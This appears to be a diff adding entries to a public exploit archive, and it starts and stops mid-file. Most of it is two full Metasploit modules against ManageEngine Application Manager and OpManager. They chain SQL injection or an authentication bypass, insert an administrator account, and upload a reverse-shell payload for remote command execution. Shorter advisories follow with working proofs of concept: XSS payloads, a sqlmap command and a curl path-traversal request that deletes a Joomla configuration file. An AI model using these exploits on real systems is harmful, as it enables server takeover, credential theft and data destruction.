'uri' => normalize_uri(target_uri.path, 'apiclient', 'ember', 'Login.jsp'),
)
appm_adr = res.body.split('<iframe src="')[1].split('/Logout.do?showPreLogin=false')[0]
am_host = appm_adr.split('://')[1].split(':')[0]
am_port = appm_adr.split('://')[1].split(':')[1]
if res && res.code == 200 && res.body.include?('.loginForm')
@cookie = res.get_cookies
res = send_request_cgi(
'rhost' => am_host,
'rport' => am_port,
'method' => 'GET',
'cookie' => @cookie,
'uri' => '/Logout.do?showPreLogin=true',
)
appm_cookie = 'JSESSIONID_APM_' << res.headers['set-cookie'].split('JSESSIONID_APM_')[1].split('; ')[0]
else
print_error("APM Plugin does not working!")
end
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'apiclient', 'ember', 'j_security_check'),
'vars_post' => {
'j_username' => datastore['USERNAME'],
'j_password' => datastore['PASSWORD']
}
)
if res && res.code == 302
print_good("Successful login OPM with user : #{datastore['USERNAME']}")
@cookie = res.get_cookies
saltcookie = res.headers['set-cookie'].split('JSESSIONID=')[1].split('; ')[0]
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, ';jsessionid=' + saltcookie),
'cookie' => @cookie,
)
@cookie = res.get_cookies
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'apiclient', 'ember', 'index.jsp'),
'cookie' => @cookie,
)
cookie = @cookie + " " + res.get_cookies
res = send_request_cgi(
'rhost' => am_host,
'rport' => am_port,
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/MyPage.do?method=viewDashBoard&plugin_view=true&PRINTER_FRIENDLY=true&opm_user=' + datastore['USERNAME']),
'cookie' => cookie
)
@cookie = cookie + " " + res.get_cookies
res = send_request_cgi(
'method' => 'POST',
'rhost' => am_host,
'rport' => am_port,
'cookie' => @cookie,
'uri' => normalize_uri(target_uri.path, '/j_security_check'),
'vars_post' => {
'j_username' => datastore['USERNAME'],
'j_password' => datastore['USERNAME'] + "@opm",
'submit' => 'Login'
}
)
res = send_request_cgi(
'rhost' => am_host,
'rport' => am_port,
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/MyPage.do?method=viewDashBoard&plugin_view=true&PRINTER_FRIENDLY=true&opm_user=' + datastore['USERNAME']),
'cookie' => @cookie
)
@cookies = @cookie + " " + res.get_cookies
send_sqli(am_host, am_port, @cookies, @cookie)
else
fail_with(Failure::Unreachable, 'Connection error occurred! User information is incorrect.')
end
end
def exploit
unless Exploit::CheckCode::Vulnerable == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
app_login
end
def send_sqli(host, port, cookies, cookie)
@uname = Rex::Text.rand_text_alpha_lower(6)
uid = rand_text_numeric(3)
apk = rand_text_numeric(6)
@pwd = rand_text_alphanumeric(8+rand(9))
@uidCHR = "#{uid.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
@unameCHR = "#{@uname.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
@apkCHR = "#{apk.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
@adm = "CHAR(65)+CHAR(68)+CHAR(77)+CHAR(73)+CHAR(78)"
pg_user =""
pg_user << "1;insert+into+AM_UserPasswordTable+(userid,username,password)+values+"
pg_user << "($$#{uid}$$,$$#{@uname}$$,$$#{Rex::Text.md5(@pwd)}$$);"
pg_user << "insert+into+Am_UserGroupTable+(username,groupname)+values+($$#{@uname}$$,$$ADMIN$$);--+"
ms_user =""
ms_user << "1 INSERT INTO AM_UserPasswordTable(userid,username,password,apikey) values (#{@uidCHR},"
ms_user << " #{@unameCHR}, 0x#{Rex::Text.md5(@pwd)}, #{@apkCHR});"
ms_user << "INSERT INTO AM_UserGroupTable(username,groupname) values (#{@unameCHR}, #{@adm})--"
res = send_request_cgi(
'rhost' => host,
'rport' => port,
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/jsp/NewThresholdConfiguration.jsp?resourceid=' + pg_user + '&attributeIDs=17,18&attributeToSelect=18'),
'cookie' => cookies
)
res = send_request_cgi(
'rhost' => host,
'rport' => port,
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/jsp/NewThresholdConfiguration.jsp?resourceid=' + ms_user + '&attributeIDs=17,18&attributeToSelect=18'),
'cookie' => cookies
)
res = send_request_cgi(
'rhost' => host,
'rport' => port,
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'applications.do'),
)
if res && res.code == 200 && res.body.include?('.loginDiv')
@cookie = res.get_cookies
res = send_request_cgi(
'method' => 'POST',
'rhost' => host,
'rport' => port,
'cookie' => @cookie,
'uri' => normalize_uri(target_uri.path, '/j_security_check'),
'vars_post' => {
'clienttype' => 'html',
'j_username' => @uname,
'j_password' => @pwd,
'submit' => 'Login'
}
)
if res && res.code == 302 && res.body.include?('Redirecting to')
print_good("Privilege Escalation was successfully performed.")
print_good("New APM admin username = " + @uname)
print_good("New APM admin password = " + @pwd)
res = send_request_cgi(
'rhost' => host,
'rport' => port,
'cookie' => @cookie,
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'applications.do'),
)
@cookie = res.get_cookies
check_platform(host, port, @cookie)
else
fail_with(Failure::NotVulnerable, 'Failed to perform privilege escalation!')
end
else
fail_with(Failure::NotVulnerable, 'Something went wrong!')
end
end
end

335
exploits/multiple/remote/47228.rb Executable file
View file

@ -0,0 +1,335 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "ManageEngine Application Manager v14.2 - Privilege Escalation / Remote Command Execution",
'Description' => %q(
This module exploits sqli and command injection vulnerability in the ME Application Manager v14.2 and prior versions.
Module creates a new admin user with SQLi (MSSQL/PostgreSQL) and provides privilege escalation.
Therefore low authority user can gain the authority of "system" on the server.
It uploads malicious file using the "Execute Program Action(s)" feature of Application Manager.
/////// This 0day has been published at DEFCON-AppSec Village. ///////
),
'License' => MSF_LICENSE,
'Author' =>
[
'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
],
'References' =>
[
[ 'URL', 'http://pentest.com.tr/exploits/DEFCON-ManageEngine-APM-v14-Privilege-Escalation-Remote-Command-Execution.html' ]
],
'DefaultOptions' =>
{
'WfsDelay' => 60,
'RPORT' => 9090,
'SSL' => false,
'PAYLOAD' => 'generic/shell_reverse_tcp'
},
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
},
'Platform' => ['unix', 'win'],
'Targets' =>
[
[ 'Windows Target',
{
'Platform' => ['win'],
'Arch' => ARCH_CMD,
}
],
[ 'Linux Target',
{
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
}
}
}
]
],
'DisclosureDate' => '10 August 2019 //DEFCON',
'DefaultTarget' => 0))
register_options(
[
OptString.new('USERNAME', [true, 'OpManager Username']),
OptString.new('PASSWORD', [true, 'OpManager Password']),
OptString.new('TARGETURI', [true, 'Base path for ME application', '/'])
],self.class)
end
def check_platform(cookie)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'showTile.do'),
'cookie' => cookie,
'vars_get' => {
'TileName' => '.ExecProg',
'haid' => 'null',
}
)
if res && res.code == 200 && res.body.include?('createExecProgAction')
@dir = res.body.split('name="execProgExecDir" maxlength="200" size="40" value="')[1].split('" class=')[0]
if @dir =~ /:/
platform = Msf::Module::Platform::Windows
else
platform = Msf::Module::Platform::Unix
end
else
fail_with(Failure::Unreachable, 'Connection error occurred! DIR could not be detected.')
end
file_up(cookie, platform, @dir)
end
def file_up(cookie, platform, dir)
if platform == Msf::Module::Platform::Windows
filex = ".bat"
else
if payload.encoded =~ /sh/
filex = ".sh"
elsif payload.encoded =~ /perl/
filex = ".pl"
elsif payload.encoded =~ /awk 'BEGIN{/
filex = ".sh"
elsif payload.encoded =~ /python/
filex = ".py"
elsif payload.encoded =~ /ruby/
filex = ".rb"
else
fail_with(Failure::Unknown, 'Payload type could not be checked!')
end
end
@fname= rand_text_alpha(9 + rand(3)) + filex
data = Rex::MIME::Message.new
data.add_part('./', nil, nil, 'form-data; name="uploadDir"')
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"theFile\"; filename=\"#{@fname}\"")
res = send_request_cgi({
'method' => 'POST',
'data' => data.to_s,
'agent' => 'Mozilla',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'cookie' => cookie,
'uri' => normalize_uri(target_uri, "Upload.do")
})
if res && res.code == 200 && res.body.include?('icon_message_success')
print_good("#{@fname} malicious file has been uploaded.")
create_exec_prog(cookie, dir, @fname)
else
fail_with(Failure::Unknown, 'The file could not be uploaded!')
end
end
def create_exec_prog(cookie, dir, fname)
@display = rand_text_alphanumeric(7)
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'adminAction.do'),
'cookie' => cookie,
'vars_post' => {
'actions' => '/showTile.do?TileName=.ExecProg&haid=null',
'method' => 'createExecProgAction',
'id' => 0,
'displayname' => @display,
'serversite' => 'local',
'choosehost' => -2,
'abortafter' => 5,
'command' => fname,
'execProgExecDir' => dir,
'cancel' => 'false'
}
)
if res && res.code == 200 && res.body.include?('icon_message_success')
actionid = res.body.split('actionid=')[1].split("','710','350','250','200')")[0]
print_status("Transactions completed. Attempting to get a session...")
exec(cookie, actionid)
else
fail_with(Failure::Unreachable, 'Connection error occurred!')
end
end
def exec(cookie, action)
send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'common', 'executeScript.do'),
'cookie' => cookie,
'vars_get' => {
'method' => 'testAction',
'actionID' => action,
'haid' => 'null'
}
)
end
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def print_error(msg='')
super("#{peer} - #{msg}")
end
def print_good(msg='')
super("#{peer} - #{msg}")
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.do'),
)
# For this part the build control will be placed.
if res && res.code == 200 && res.body.include?('Build No:142')
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def app_login
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'applications.do'),
)
if res && res.code == 200 && res.body.include?('.loginDiv')
@cookie = res.get_cookies
res = send_request_cgi(
'method' => 'POST',
'cookie' => @cookie,
'uri' => normalize_uri(target_uri.path, '/j_security_check'),
'vars_post' => {
'clienttype' => 'html',
'j_username' => datastore['USERNAME'],
'j_password' => datastore['PASSWORD'],
'submit' => 'Login'
}
)
if res && res.code == 303
res = send_request_cgi(
'cookie' => @cookie,
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'applications.do'),
)
@cookie = res.get_cookies
send_sqli(@cookie)
else
fail_with(Failure::NotVulnerable, 'Failed to perform privilege escalation!')
end
else
fail_with(Failure::Unreachable, 'Connection error occurred! User information is incorrect.')
end
end
def exploit
unless Exploit::CheckCode::Vulnerable == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
app_login
end
def send_sqli(cookies)
@uname = Rex::Text.rand_text_alpha_lower(6)
uid = rand_text_numeric(3)
apk = rand_text_numeric(6)
@pwd = rand_text_alphanumeric(8+rand(9))
@uidCHR = "#{uid.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
@unameCHR = "#{@uname.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
@apkCHR = "#{apk.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
@adm = "CHAR(65)+CHAR(68)+CHAR(77)+CHAR(73)+CHAR(78)"
pg_user =""
pg_user << "1;insert+into+AM_UserPasswordTable+(userid,username,password)+values+"
pg_user << "($$#{uid}$$,$$#{@uname}$$,$$#{Rex::Text.md5(@pwd)}$$);"
pg_user << "insert+into+Am_UserGroupTable+(username,groupname)+values+($$#{@uname}$$,$$ADMIN$$);--+"
ms_user =""
ms_user << "1 INSERT INTO AM_UserPasswordTable(userid,username,password,apikey) values (#{@uidCHR},"
ms_user << " #{@unameCHR}, 0x#{Rex::Text.md5(@pwd)}, #{@apkCHR});"
ms_user << "INSERT INTO AM_UserGroupTable(username,groupname) values (#{@unameCHR}, #{@adm})--"
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/jsp/NewThresholdConfiguration.jsp?resourceid=' + pg_user + '&attributeIDs=17,18&attributeToSelect=18'),
'cookie' => cookies
)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/jsp/NewThresholdConfiguration.jsp?resourceid=' + ms_user + '&attributeIDs=17,18&attributeToSelect=18'),
'cookie' => cookies
)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'applications.do'),
)
if res && res.code == 200 && res.body.include?('.loginDiv')
@cookie = res.get_cookies
res = send_request_cgi(
'method' => 'POST',
'cookie' => @cookie,
'uri' => normalize_uri(target_uri.path, '/j_security_check'),
'vars_post' => {
'clienttype' => 'html',
'j_username' => @uname,
'j_password' => @pwd,
'submit' => 'Login'
}
)
print @uname + "//" + @pwd
puts res.body
if res && res.code == 303
print_good("Privilege Escalation was successfully performed.")
print_good("New APM admin username = " + @uname)
print_good("New APM admin password = " + @pwd)
res = send_request_cgi(
'cookie' => @cookie,
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'applications.do'),
)
@cookie = res.get_cookies
check_platform(@cookie)
else
fail_with(Failure::NotVulnerable, 'Failed to perform privilege escalation!')
end
else
fail_with(Failure::NotVulnerable, 'Something went wrong!')
end
end
end

292
exploits/multiple/remote/47229.rb Executable file
View file

@ -0,0 +1,292 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "ManageEngine OpManager v12.4x - Unauthenticated Remote Command Execution",
'Description' => %q(
This module bypasses the user password requirement in the OpManager v12.4.034 and prior versions.
It performs authentication bypass and executes commands on the server.
/////// This 0day has been published at DEFCON-AppSec Village. ///////
),
'License' => MSF_LICENSE,
'Author' =>
[
'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
],
'References' =>
[
[ 'URL', 'http://pentest.com.tr/exploits/DEFCON-ManageEngine-OpManager-v12-4-Unauthenticated-Remote-Command-Execution.html' ]
],
'DefaultOptions' =>
{
'WfsDelay' => 60,
'RPORT' => 8060,
'SSL' => false,
'PAYLOAD' => 'generic/shell_reverse_tcp'
},
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
},
'Platform' => ['unix', 'win'],
'Targets' =>
[
[ 'Windows Target',
{
'Platform' => ['win'],
'Arch' => ARCH_CMD,
}
],
[ 'Linux Target',
{
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
}
}
}
]
],
'DisclosureDate' => '10 August 2019 //DEFCON',
'DefaultTarget' => 0))
register_options(
[
OptString.new('USERNAME', [true, 'OpManager Username', 'admin']),
OptString.new('TARGETURI', [true, 'Base path for ME application', '/'])
],self.class)
end
def check_platform(host, port, cookie)
res = send_request_cgi(
'rhost' => host,
'rport' => port,
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'showTile.do'),
'cookie' => cookie,
'vars_get' => {
'TileName' => '.ExecProg',
'haid' => 'null',
}
)
if res && res.code == 200 && res.body.include?('createExecProgAction')
@dir = res.body.split('name="execProgExecDir" maxlength="200" size="40" value="')[1].split('" class=')[0]
if @dir =~ /:/
platform = Msf::Module::Platform::Windows
else
platform = Msf::Module::Platform::Unix
end
else
fail_with(Failure::Unreachable, 'Connection error occurred! DIR could not be detected.')
end
file_up(host, port, cookie, platform, @dir)
end
def file_up(host, port, cookie, platform, dir)
if platform == Msf::Module::Platform::Windows
filex = ".bat"
else
if payload.encoded =~ /sh/
filex = ".sh"
elsif payload.encoded =~ /perl/
filex = ".pl"
elsif payload.encoded =~ /awk 'BEGIN{/
filex = ".sh"
elsif payload.encoded =~ /python/
filex = ".py"
elsif payload.encoded =~ /ruby/
filex = ".rb"
else
fail_with(Failure::Unknown, 'Payload type could not be checked!')
end
end
@fname= rand_text_alpha(9 + rand(3)) + filex
data = Rex::MIME::Message.new
data.add_part('./', nil, nil, 'form-data; name="uploadDir"')
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"theFile\"; filename=\"#{@fname}\"")
res = send_request_cgi({
'rhost' => host,
'rport' => port,
'method' => 'POST',
'data' => data.to_s,
'agent' => 'Mozilla',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'cookie' => cookie,
'uri' => normalize_uri(target_uri, "Upload.do")
})
if res && res.code == 200 && res.body.include?('icon_message_success')
print_good("#{@fname} malicious file has been uploaded.")
create_exec_prog(host, port, cookie, dir, @fname)
else
fail_with(Failure::Unknown, 'The file could not be uploaded!')
end
end
def create_exec_prog(host, port, cookie, dir, fname)
@display = rand_text_alphanumeric(7)
res = send_request_cgi(
'method' => 'POST',
'rhost' => host,
'rport' => port,
'uri' => normalize_uri(target_uri.path, 'adminAction.do'),
'cookie' => cookie,
'vars_post' => {
'actions' => '/showTile.do?TileName=.ExecProg&haid=null',
'method' => 'createExecProgAction',
'id' => 0,
'displayname' => @display,
'serversite' => 'local',
'choosehost' => -2,
'abortafter' => 5,
'command' => fname,
'execProgExecDir' => dir,
'cancel' => 'false'
}
)
if res && res.code == 200 && res.body.include?('icon_message_success')
actionid = res.body.split('actionid=')[1].split("','710','350','250','200')")[0]
print_status("Transactions completed. Attempting to get a session...")
exec(host, port, cookie, actionid)
else
fail_with(Failure::Unreachable, 'Connection error occurred!')
end
end
def exec(host, port, cookie, action)
send_request_cgi(
'method' => 'GET',
'rhost' => host,
'rport' => port,
'uri' => normalize_uri(target_uri.path, 'common', 'executeScript.do'),
'cookie' => cookie,
'vars_get' => {
'method' => 'testAction',
'actionID' => action,
'haid' => 'null'
}
)
end
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def print_error(msg='')
super("#{peer} - #{msg}")
end
def print_good(msg='')
super("#{peer} - #{msg}")
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'apiclient', 'ember', 'Login.jsp'),
)
if res && res.code == 200 && res.body.include?('Logout.do?showPreLogin=false')
appm_adr = res.body.split('<iframe src="')[1].split('/Logout.do?showPreLogin=false')[0]
am_host = appm_adr.split('://')[1].split(':')[0]
am_port = appm_adr.split('://')[1].split(':')[1]
res = send_request_cgi(
'rhost' => am_host,
'rport' => am_port,
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'applications.do'),
)
# Password check vulnerability in Java Script :/
if res.body.include?('j_password.value=username')
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
else
return Exploit::CheckCode::Safe
end
end
def app_login
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'apiclient', 'ember', 'Login.jsp'),
)
appm_adr = res.body.split('<iframe src="')[1].split('/Logout.do?showPreLogin=false')[0]
am_host = appm_adr.split('://')[1].split(':')[0]
am_port = appm_adr.split('://')[1].split(':')[1]
res = send_request_cgi(
'rhost' => am_host,
'rport' => am_port,
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'applications.do'),
)
@cookie = res.get_cookies
res = send_request_cgi(
'method' => 'POST',
'rhost' => am_host,
'rport' => am_port,
'cookie' => @cookie,
'uri' => normalize_uri(target_uri.path, '/j_security_check'),
'vars_post' => {
'clienttype' => 'html',
'j_username' => datastore['USERNAME'],
'j_password' => datastore['USERNAME'] + "@opm",
'submit' => 'Login'
}
)
if res && res.code == 302 or 303
print_good("Authentication bypass was successfully performed.")
res = send_request_cgi(
'rhost' => am_host,
'rport' => am_port,
'cookie' => @cookie,
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'applications.do'),
)
@cookie = res.get_cookies
check_platform(am_host, am_port, @cookie)
else
fail_with(Failure::NotVulnerable, 'Failed to perform authentication bypass! Try with another username...')
end
end
def exploit
unless Exploit::CheckCode::Vulnerable == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
app_login
end
end

21
exploits/php/webapps/47219.txt Normal file
View file

@ -0,0 +1,21 @@
# Exploit Title:BSI Advance Hotel Booking System Persistent XSS
# Google Dork: intext:Hotel Booking System v2.0 © 2008 - 2012 Copyright Best Soft Inc
# Date: Wed Jun 4 2014
# Exploit Author: Angelo Ruwantha
# Vendor Homepage: http://www.bestsoftinc.com
# Software Link: http://www.bestsoftinc.com/php-advance-hotel-booking-system.html
# Version: V2.0
# Tested on: archlinux
# CVE : CVE-2014-4035
Vulnerability
========================
[+]Method:POST
1.http://URL/hotel-booking/booking_details.php (;persistent XSS)
allowlang=&title=<IMG SRC="javascript:alert('HelloWorld ;)');"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=
every parameter injectable :)

17
exploits/php/webapps/47221.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: [UNA - 10.0.0-RC1 stored XSS vuln.]
# Date: [2019 08 10]
# Exploit Author: [Greg.Priest]
# Vendor Homepage: [https://una.io/]
# Software Link: [https://github.com/unaio/una/tree/master/studio]
# Version: [UNA - 10.0.0-RC1]
# Tested on: [Windows/Linux ]
# CVE : [CVE-2019-14804]
UNA-v.10.0.0-RC1 [Stored XSS Vulnerability]#1
Sign in to admin and look for the ["etemplates"] page (/studio/polyglot.php?page=etemplates)!
Click ["Emails"] and edit the templates! Inject the JavaScript code into the ["System Name"] field!
http://127.0.0.1/UNA/studio/polyglot.php?page=etemplates
https://github.com/Gr3gPr1est/BugReport/blob/master/CVE-2019-14804.pdf

33
exploits/php/webapps/47222.txt Normal file
View file

@ -0,0 +1,33 @@
#Exploit Title: Joomla! component com_jssupportticket - Authenticated SQL Injection
#Dork: inurl:"index.php?option=com_jssupportticket"
#Date: 10.08.19
#Exploit Author: qw3rTyTy
#Vendor Homepage: https://www.joomsky.com/
#Software Link: https://www.joomsky.com/46/download/1.html
#Version: 1.1.6
#Tested on: Debian/nginx/joomla 3.9.0
#####################################
#Vulnerability details:
#####################################
Vulnerable code is in line 31 in file admin/models/ticketreply.php
...snip...
24 function storeTicketReplies($ticketid, $message, $created, $data2) {
25 if (!is_numeric($ticketid))
26 return false;
27
28 //validate reply for break down
29 $ticketrandomid = $data2['ticketrandomid']; //!!!
30 $db = $this->getDBo();
31 $query = "SELECT id FROM `#__js_ticket_tickets` WHERE ticketid='$ticketrandomid'"; //!!!
32 $db->setQuery($query);
33 $res = $db->loadResult();
34 if($res != $ticketid){
35 return false;
36 }//end
...snip...
#####################################
#PoC:
#####################################
$> sqlmap.py -u "http://localhost/index.php" --random-agent --dbms=mysql --method POST --data 'option=com_jssupportticket&c=ticket&task=actionticket&Itemid=666&ticketid=666&callfrom=savemessage&message=woot&created=woot&ticketrandomid=woot&{VALID_FORMTOKEN_FROM_TICKETDETAIL}=1' -p ticketrandomid --cookie 'VALID_SESSION_ID=VALID_SESSION_ID'

64
exploits/php/webapps/47223.txt Normal file
View file

@ -0,0 +1,64 @@
#Exploit Title: Joomla! component com_jssupportticket - Authenticated Arbitrary File Deletion
#Dork: inurl:"index.php?option=com_jssupportticket"
#Date: 10.08.19
#Exploit Author: qw3rTyTy
#Vendor Homepage: https://www.joomsky.com/
#Software Link: https://www.joomsky.com/46/download/1.html
#Version: 1.1.6
#Tested on: Debian/nginx/joomla 3.9.0
#####################################
#Vulnerability details:
#####################################
This vulnerability is caused when processing custom user field.
file: admin/models/ticket.php
function: storeTicket
54 function storeTicket($data){
...snip...
75 $userfield = $this->getJSModel('userfields')->getUserfieldsfor(1);
76 $params = array();
77 foreach ($userfield AS $ufobj) {
78 $vardata = '';
...snip...
121 if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 1){
122 $customflagfordelete = true;
123 $custom_field_namesfordelete[]= $data[$ufobj->field.'_2']; //no check.
...snip...
198 if($customflagfordelete == true){
199 foreach ($custom_field_namesfordelete as $key) {
200 $res = $this->removeFileCustom($ticketid,$key); //!!!
201 }
202 }
...snip...
1508 function removeFileCustom($id, $key){
1509 $filename = str_replace(' ', '_', $key);
1510
1511 if(! is_numeric($id))
1512 return;
1513
1514 $db = JFactory::getDbo();
1515 $config = $this->getJSModel('config')->getConfigByFor('default');
1516 $datadirectory = $config['data_directory'];
1517
1518 $base = JPATH_BASE;
1519 if(JFactory::getApplication()->isAdmin()){
1520 $base = substr($base, 0, strlen($base) - 14); //remove administrator
1521 }
1522
1523 $path = $base . '/' . $datadirectory. '/attachmentdata/ticket';
1524
1525 $query = "SELECT attachmentdir FROM `#__js_ticket_tickets` WHERE id = ".$id;
1526 $db->setQuery($query);
1527 $foldername = $db->loadResult();
1528 $userpath = $path . '/' . $foldername.'/'.$filename;
1529 unlink($userpath); //!!!
1530 return;
1531 }
#####################################
#PoC:
#####################################
When administrator has added custom user field as "19", attacker are can trigger this vulnerability by send a following request.
$> curl -X POST -i -F 'option=com_jssupportticket' -F 'c=ticket' -F 'task=saveTicket' -F '{VALID_FORMTOKEN_FROM_FORMTICKET}=1' -F 'Itemid=666' -F 'id=' -F 'message=woot' -F '19_1=1' -F '19_2=../../../../configuration.php' -F 'filename[]=@./woot.txt' -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' 'http://localhost/index.php'

55
exploits/php/webapps/47224.txt Normal file
View file

@ -0,0 +1,55 @@
# Exploit Title: osTicket-v1.12 Stored XSS via File Upload
# Vendor Homepage: https://osticket.com/
# Software Link: https://osticket.com/download/
# Exploit Author: Aishwarya Iyer
# Contact: https://twitter.com/aish_9524
# Website: https://about.me/aish_iyer
# Category: webapps
# CVE: CVE-2019-14748
1. Description
An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1.
The Ticket creation form allows users to upload files along with queries.
It was found that the file-upload functionality has fewer (or no)
mitigations implemented for file content checks; also, the output is not
handled properly, causing persistent XSS that leads to cookie stealing or
malicious actions. For
example, a non-agent user can upload a .html file, and Content-Disposition
will be set to inline instead of an attachment.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14748
2. Proof of Concept
Steps to Reproduce:
- Login to the portal as a non agent user:
- Open a New Ticket
- Select any option from the dropdown menu present under "Help Topic"
- Text box appears, enter details accordingly
- In the section "drop files here or choose them", we would be putting our
payload
- Open any text editor and name the file as test(say) with .html extension.
- Within the file, enter the payload
<script>alert(document.cookie);</script>
- Save the test.html file.
- Now click on drop files here option and enter the test.html file.
- Click on "create ticket" option
- Login with another user(agent)
- Now within the User Directory, go to the user under which the payload has
been put.
- The ticket raised with the name mentioned will be shown under the subject
category.
- Scroll down and the file uploaded will be present below.
- Click on the file, and the payload gets executed which is persistent
3. Reference
https://github.com/osTicket/osTicket/commit/33ed106b1602f559a660a69f931a9d873685d1ba
https://github.com/osTicket/osTicket/releases/tag/v1.12.1
https://github.com/osTicket/osTicket/releases/tag/v1.10.7
4. Solution
The vulnerability has been patched by the vendor in the next release which
is osTicket v1.10.7.

51
exploits/php/webapps/47225.txt Normal file
View file

@ -0,0 +1,51 @@
# Exploit Title: osTicket-v1.12 Formula Injection
# Vendor Homepage: https://osticket.com/
# Software Link: https://osticket.com/download/
# Exploit Author: Aishwarya Iyer
# Contact: https://twitter.com/aish_9524
# Website: https://about.me/aish_iyer
# Category: webapps
# CVE: CVE-2019-14749
1. Description
An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1.
CSV (aka Formula) injection exists in the export spreadsheets
functionality. These spreadsheets are generated dynamically from
unvalidated or unfiltered user input in the Name and Internal Notes fields
in the Users tab, and the Issue Summary field in the tickets tab. This
allows other agents to download data in a .csv file format or .xls file
format. This is used as input for spreadsheet applications such as Excel
and OpenOffice Calc, resulting in a situation where cells in the
spreadsheets can contain input from an untrusted source. As a result, the
end user who is accessing the exported spreadsheet can be affected.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14749
2. Proof of Concept
Steps to Reproduce:
- Login as an agent and under the "Users" section create a new user.
- Insert the crafted payload of Formula Injection into "Name" and "Internal
Notes" field.
- Login as another agent and under the Users tab, click on export and then
save the ".csv" file.
- It is observed that the payload gets executed in excel and this leads to
remote code execution.
- Not just an agent, even a non-agent user has the option to edit his name
where he can insert the malicious payload of Formula Injection.
- The application does not sanitize the inputs here due to which when the
agent clicks on export the payload gets executed.
-The same issue persisted in the "Issue Summary" field in the tickets tab.
3. Reference
https://github.com/osTicket/osTicket/commit/99818486c5b1d8aa445cee232825418d6834f249
https://github.com/osTicket/osTicket/releases/tag/v1.12.1
https://github.com/osTicket/osTicket/releases/tag/v1.10.7
4. Solution
The vulnerability has been patched by the vendor in the next release which
is osTicket v1.10.7.

42
exploits/php/webapps/47226.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: osTicket-v1.12 Stored XSS
# Vendor Homepage: https://osticket.com/
# Software Link: https://osticket.com/download/
# Exploit Author: Aishwarya Iyer
# Contact: https://twitter.com/aish_9524
# Website: https://about.me/aish_iyer
# Category: webapps
# CVE: CVE-2019-14750
1. Description
An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1.
Stored XSS exists in setup/install.php. It was observed that no input
sanitization was provided in the firstname and lastname fields of the
